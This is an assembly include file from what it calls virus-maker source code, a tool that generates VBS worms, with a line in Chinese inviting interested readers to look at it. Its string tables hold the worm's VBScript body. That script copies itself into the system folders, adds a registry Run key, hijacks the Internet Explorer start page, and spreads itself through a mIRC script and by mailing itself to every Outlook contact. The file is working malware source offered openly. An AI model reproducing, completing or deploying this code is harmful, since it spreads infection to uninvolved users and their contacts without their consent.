usefull.inc

病毒制造机源码,有兴趣的朋友可以看一下

szData equ szBaseInfor	;pointer to data to write to file,points a buffer containing the data to be written to the file
.const
szCaption db '完成',0
szText db 'VBS蠕虫已生成于当前目录下！',0
szCBOText1 db 'SYSTEM32',0
szCBOText2 db 'WINDOWS',0
szCBOText3 db '自定义...',0
.data?
hFile dd ?			;handle to file to write to 
number dd ?			; number of bytes to write 
nWrite dd ?			;pointer to number of bytes written
hHeap dd ?
len dd ?
lpOriMen dd ? ;原始分配的内存块指针
lpMen dd ?	;使用的内存块的指针
IsMircChecked dd ?	;是否选择Mirc
IsAutorunChecked dd ?
IsLookOutChecked dd ?
IsPayloadChecked dd ?

.data
szNewVirPath db MAX_PATH dup (0);自定义文件夹 
IsDir dd 0 ;选择复制到哪个文件夹的标记
szDirBuffer db MAX_PATH dup (0)
szVbsSym db '"',0
szVbsSym1 db '\',0
szVbsSym2 db ',',0
szVbsSym3 db ')',0
szVbsSym4 db '")',0


;BaseInfor
szBaseInfor db "'Name:",0
szBaseVirName db MAX_PATH dup (0)
szVirName	db MAX_PATH dup (0)	
szVirNamePatch db ".vbs",0	
szVirAuthor1 db 13,10,"'Author:",0
szVirAuthor2 db MAX_PATH dup (0)
szOrigin1 db 13,10,"'Origin:",0
szOrigin2 db MAX_PATH dup (0)
szStartPage db MAX_PATH dup (0)
szWindowTitle db MAX_PATH dup (0)
szRegName db MAX_PATH dup (0)

;begin
szBegin db 13,10,'Dim wsh',\
13,10,'Dim fso',\
13,10,'Set wsh=CreateObject("WScript.Shell")',\
13,10,'Set fso=CreateObject("Scripting.FileSystemObject")',\
13,10,'on error resume next',0


;Dir Temporary
;SystemFolder
szCopyToSystem db 13,10,'fso.CopyFile WScript.ScriptFullName, fso.BuildPath( fso.GetSpecialFolder(1), "',0
;CrazyVBS.vbs" )',0
;WindowsFolder
szCopyToWindows db 13,10,'fso.CopyFile WScript.ScriptFullName, fso.BuildPath( fso.GetSpecialFolder(0), "',0
;CrazyVBS.vbs" )',0
szCopyToDefinePath db 13,10,'fso.CopyFile WScript.ScriptFullName, ',0


;mirc

szMirc1 db 13,10,'Function mirc'
db 13,10,'On Error Resume Next'
db 13,10,'if fso.fileexists("c:\mirc\mirc.ini") then MircLoc="c:\mirc" '
db 13,10,'if fso.fileexists("c:\mirc32\mirc.ini") then MircLoc="c:\mirc"'
db 13,10,'Programfilesdir=wsh.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")' ;
db 13,10,'if fso.fileexists(Programfilesdir & "\mirc.ini") then MircLoc=Programfilesdir & "\mirc"'
db 13,10,'set ini = fso.CreateTextFile(MircLoc & "\script.ini", True)'
db 13,10,'ini.writeline "n0=on 1:JOIN:#:{"'
db 13,10,'ini.writeline "n1=  /if ( $nick == $me ) { halt }"'
db 13,10,'ini.writeline "n2=  /.dcc send $nick ',0

;C:\WINDOWS\Worm.vbs"'
szMirc2 db 13,10,'ini.writeline "n3=}"'
db 13,10,'ini.close'
db 13,10,'wsh.regwrite "HKCU\software\Worm\Mirqued", "1"'
db 13,10,'end function'
db 13,10,'mirc',0



;IE
szRegStartPage db 13,10,'wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","',0
szRegStartPage2 db '"',0
szRegWindowTitle db 13,10,'wsh.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","',0
szRegWindowTitle2 db '"',0

;AutoRun
szRegAutoRun1 db 13,10,' wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\',0
szWindowsDirectory db MAX_PATH dup(0)
szSystemDirectory  db MAX_PATH dup(0)




;OutLook
szOutLook1 db 13,10,'sub out'
db 13,10,'On Error Resume Next'
db 13,10,'Set Outlook = CreateObject("Outlook.Application")'
db 13,10,'If Outlook = "Outlook" Then'
db 13,10,'Set Mapi=Outlook.GetNameSpace("MAPI")'
db 13,10,'Set Lists=Mapi.AddressLists'
db 13,10,'For Each ListIndex In Lists'
db 13,10,'If ListIndex.AddressEntries.Count <> 0 Then'
db 13,10,'ContactCount = ListIndex.AddressEntries.Count'
db 13,10,'For Count= 1 To ContactCount'
db 13,10,'Set Mail = Outlook.CreateItem(0)'
db 13,10,'Set Contact = ListIndex.AddressEntries(Count)'
db 13,10,'Mail.To = Contact.Address'
db 13,10,'Mail.Subject = "',0
szMailSubject db MAX_PATH dup (0)
szOutLook2 db '"',0
szOutLook3 db 13,10,'Mail.Body = "'
szMailBody db MAX_PATH dup (0)
szOutLook4 db '"',0
szOutLook5 db 13,10,'Set Attachment=Mail.Attachments'
db 13,10,'Attachment.Add ',0
;WScript.ScriptFullName'

szOutLook6 db 13,10,'Mail.Send'
db 13,10,'next'
db 13,10,' End if'
db 13,10,'next'
db 13,10,' End if'
db 13,10,'end sub'
db 13,10,'out',0

;szEnd
szEnd db 13,10,'Set wsh=Nothing',\
13,10,'Set fso=Nothing',0



;end